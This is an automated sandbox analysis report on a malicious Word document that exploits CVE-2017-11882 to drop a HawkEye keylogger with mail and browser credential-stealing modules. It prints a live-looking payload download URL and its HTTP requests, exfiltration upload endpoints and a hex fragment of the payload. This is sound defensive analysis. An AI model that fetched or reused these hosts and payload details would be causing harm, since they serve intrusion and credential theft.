Analysis Report SWIFT.doc

Overview

General Information

Sample Name: SWIFT.doc
Analysis ID: 330287
MD5: 516028d299e8b6b9f947fdb4541a5d7e
SHA1: fa9c3d41dcd61c1dcade0ba7943882cf640a71cd
SHA256: 6de5a6a916916823583495dae424fa8ce2f54c33f2a67da83337b6f2579e816c
Tags: doc

Detection

HawkEye, M00nD3v Logger, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected M00nD3v Logger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Injects a PE file into a foreign process
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://mangero.ga/izux/hktestfile.scr Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.1492.10.memstr Malware Configuration Extractor: HawkEye {"Modules": ["mailpv"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: SWIFT.doc Virustotal: Detection: 44%
Source: SWIFT.doc ReversingLabs: Detection: 47%
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.izux978537.scr.400000.1.unpack Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: number of queries: 1002
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen, 10_2_0040702D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_0024A8E8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_0024A8E2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then jmp 00600DDFh 9_2_00600A88
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then jmp 00600DDFh 9_2_00600A78
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mangero.ga
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 14 Dec 2020 16:49:33 GMT
Content-Length: 7447752
Connection: keep-alive
Last-Modified: Mon, 14 Dec 2020 05:14:33 GMT
ETag: "71a4c8-5b665b7b1b004"
Accept-Ranges: bytes
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 f0 b4 d6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 88 71 00 00 02 00 00 00 00 00 00 0e a6 71 00 00 20 00 00 00 c0 71 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 71 00 00 02 00 00 9a 75 72 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 a5 71 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 71 00 c8 18 00 00 00 c0 71 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 86 71 00 00 20 00 00 00 88 71 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 71 00 00 02 00 00 00 8a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a5 71 00 00 00 00 00 48 00 00 00 02 00 05 00 08 00 71 00 ac a5 00 00 03 00 00 00 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 09 00 00 06 39 18 00 00 00 fe 09 00 00 72 f6 5a 00 70 fe 09 01 00 28 1c 00 00 0a 28 1d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a fe 09 00 00 2a 66 fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 02 20 00 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 06 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 07 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 08 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 0a 00 00 00 fe 01 2a 4a fe 09 00 00 20 40 00 00 00 5f 20 40 00 00 00 fe 01 2a 4a fe 09 00 00 20 10 00 00 00 5f 20 10 00 00 00 fe 01 2a a6 7f f6 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 25 00 00 06 73 2d 00 00 0a 80 f6 00 00 04 7f f6 00 00 04 28 0f 00 00 0a 2a a6 7f f7 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 26 00 00 06 73 2d 00 00 0a 80 f7 00 00 04 7f f7 00 00 04 28 0f 00 00 0a 2a 1a 28 10 00 00 0a 2a 76 28 23 00 00 06 39 0d 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GPI-ASRU GPI-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /izux/hktestfile.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: mangero.ga
Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A2D0E25-5575-4F65-9737-3BA52E43A74D}.tmp
Source: global traffic HTTP traffic detected:
GET /izux/hktestfile.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: mangero.ga
Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: mangero.ga
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://bot.whatismyipaddress.com/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://dyn.com/dns/
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.php
Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375869139.0000000002B31000.00000004.00000001.sdmp, izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll;HawkEye
Source: hktestfile[1].scr.2.dr String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Contains functionality to read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040ADA4 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, 10_2_0040ADA4

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B13CB0 NtUnmapViewOfSection, 9_2_00B13CB0
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024C838 9_2_0024C838
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00241108 9_2_00241108
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002489A8 9_2_002489A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002419B1 9_2_002419B1
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002499F9 9_2_002499F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002432B0 9_2_002432B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002482F0 9_2_002482F0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00242358 9_2_00242358
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002413E0 9_2_002413E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002404E8 9_2_002404E8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A528 9_2_0024A528
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024DE98 9_2_0024DE98
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024703A 9_2_0024703A
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00247048 9_2_00247048
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002450EA 9_2_002450EA
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002458F9 9_2_002458F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024D8CA 9_2_0024D8CA
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245908 9_2_00245908
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00248998 9_2_00248998
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002469C8 9_2_002469C8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002469D8 9_2_002469D8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244238 9_2_00244238
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244248 9_2_00244248
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024D2B0 9_2_0024D2B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024329E 9_2_0024329E
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002482E0 9_2_002482E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245B09 9_2_00245B09
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024CB40 9_2_0024CB40
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00246B93 9_2_00246B93
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002454A0 9_2_002454A0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245490 9_2_00245490
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244DE0 9_2_00244DE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00241DF2 9_2_00241DF2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244DD0 9_2_00244DD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002456B0 9_2_002456B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002476F9 9_2_002476F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002456C0 9_2_002456C0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00247708 9_2_00247708
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0048 9_2_005B0048
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BC174 9_2_005BC174
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B5168 9_2_005B5168
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BDB42 9_2_005BDB42
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B8498 9_2_005B8498
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD5F8 9_2_005BD5F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BF728 9_2_005BF728
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B5FB0 9_2_005B5FB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0FA0 9_2_005B0FA0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B8858 9_2_005B8858
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD0B7 9_2_005BD0B7
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD112 9_2_005BD112
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B7A28 9_2_005B7A28
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B4C10 9_2_005B4C10
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B155E 9_2_005B155E
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B1542 9_2_005B1542
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BCD41 9_2_005BCD41
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B152D 9_2_005B152D
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B7608 9_2_005B7608
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B6EED 9_2_005B6EED
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B6EA5 9_2_005B6EA5
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0FF8 9_2_005B0FF8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060D990 9_2_0060D990
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060AFB0 9_2_0060AFB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606408 9_2_00606408
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006010A2 9_2_006010A2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006010A8 9_2_006010A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006059E0 9_2_006059E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006059D0 9_2_006059D0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006056A8 9_2_006056A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060A3E0 9_2_0060A3E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006063F8 9_2_006063F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606FC8 9_2_00606FC8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606FB9 9_2_00606FB9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B11400 9_2_00B11400
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10A50 9_2_00B10A50
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B103AD 9_2_00B103AD
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B1319D 9_2_00B1319D
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B113FE 9_2_00B113FE
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10FE0 9_2_00B10FE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10FD0 9_2_00B10FD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B11F10 9_2_00B11F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404DE5 10_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404E56 10_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404EC7 10_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404F58 10_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040BF6B 10_2_0040BF6B
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00412084 appears 39 times
Yara signature match
Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
